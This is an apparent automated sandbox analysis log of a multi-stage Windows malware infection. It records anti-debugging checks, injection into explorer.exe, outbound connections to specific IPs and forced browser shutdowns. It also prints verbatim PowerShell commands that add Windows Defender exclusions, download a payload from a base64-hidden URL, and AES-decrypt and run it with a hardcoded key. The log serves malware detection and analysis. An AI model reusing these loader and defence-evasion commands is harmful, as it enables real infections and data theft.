Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_049E0801 rdtsc

0_2_049E0801

Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe

Code function: 7_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

7_2_000000014000D9C4

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101652B mov eax, dword ptr fs:[00000030h]	0_2_0101652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0101A302 mov eax, dword ptr fs:[00000030h]	0_2_0101A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0098A302 mov eax, dword ptr fs:[00000030h]	1_2_0098A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0098652B mov eax, dword ptr fs:[00000030h]	1_2_0098652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0098A302 mov eax, dword ptr fs:[00000030h]	2_2_0098A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0098652B mov eax, dword ptr fs:[00000030h]	2_2_0098652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0098A302 mov eax, dword ptr fs:[00000030h]	6_2_0098A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0098652B mov eax, dword ptr fs:[00000030h]	6_2_0098652B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 154.216.20.243 443
Source: C:\Windows\explorer.exe	Network Connect: 185.157.162.216 5200

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 2bd330404c.exe PID: 1608, type: MEMORYSTR

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe "C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe "C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe "C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe "C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe "C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net session	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4='))) -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$key = [System.Text.Encoding]::UTF8.GetBytes('blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9');" "$iv = [System.Text.Encoding]::UTF8.GetBytes('5t9nsUPo0cA/tUjH');" "$aes = [System.Security.Cryptography.Aes]::Create();" "$aes.Key = $key; $aes.IV = $iv;" "$decryptor = $aes.CreateDecryptor();" "$inputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.bin';" "$encryptedBytes = [System.IO.File]::ReadAllBytes($inputFile);" "$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length);" "$outputFile = 'C:\Users\user\AppData\Local\Temp\downloaded_file.exe';" "[System.IO.File]::WriteAllBytes($outputFile, $decryptedBytes);"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe "C:\Users\user\AppData\Local\Temp\downloaded_file.exe"	Jump to behavior
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsSystem\WindowsSystem.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe'

Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "invoke-webrequest -uri ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('ahr0chm6ly93b28wotc4nzg3odeud2lul2rvd25sb2fkzwrfzmlszs5iaw4='))) -outfile 'c:\users\user\appdata\local\temp\downloaded_file.bin'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$key = [system.text.encoding]::utf8.getbytes('blmgb+wrfprxmfxk7ymkpm3svhuaypt9');" "$iv = [system.text.encoding]::utf8.getbytes('5t9nsupo0ca/tujh');" "$aes = [system.security.cryptography.aes]::create();" "$aes.key = $key; $aes.iv = $iv;" "$decryptor = $aes.createdecryptor();" "$inputfile = 'c:\users\user\appdata\local\temp\downloaded_file.bin';" "$encryptedbytes = [system.io.file]::readallbytes($inputfile);" "$decryptedbytes = $decryptor.transformfinalblock($encryptedbytes, 0, $encryptedbytes.length);" "$outputfile = 'c:\users\user\appdata\local\temp\downloaded_file.exe';" "[system.io.file]::writeallbytes($outputfile, $decryptedbytes);"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "invoke-webrequest -uri ([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('ahr0chm6ly93b28wotc4nzg3odeud2lul2rvd25sb2fkzwrfzmlszs5iaw4='))) -outfile 'c:\users\user\appdata\local\temp\downloaded_file.bin'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "$key = [system.text.encoding]::utf8.getbytes('blmgb+wrfprxmfxk7ymkpm3svhuaypt9');" "$iv = [system.text.encoding]::utf8.getbytes('5t9nsupo0ca/tujh');" "$aes = [system.security.cryptography.aes]::create();" "$aes.key = $key; $aes.iv = $iv;" "$decryptor = $aes.createdecryptor();" "$inputfile = 'c:\users\user\appdata\local\temp\downloaded_file.bin';" "$encryptedbytes = [system.io.file]::readallbytes($inputfile);" "$decryptedbytes = $decryptor.transformfinalblock($encryptedbytes, 0, $encryptedbytes.length);" "$outputfile = 'c:\users\user\appdata\local\temp\downloaded_file.exe';" "[system.io.file]::writeallbytes($outputfile, $decryptedbytes);"	Jump to behavior

Source: b5c7128cd0.exe, 00000014.00000002.2740239849.0000000000F32000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1734687409.0000000000B82000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: %Program Manager
Source: 2bd330404c.exe, 00000011.00000002.2939481486.00000000004E2000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: #Program Manager
Source: c92938c010.exe, c92938c010.exe, 00000010.00000002.2937644494.000000000062C000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: VProgram Manager
Source: c92938c010.exe, c92938c010.exe, 00000010.00000002.2973343876.0000000006C65000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: (Program Manager
Source: firefox.exe, 00000022.00000002.2858100793.0000000DD69FB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0096DD91 cpuid

6_2_0096DD91

Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
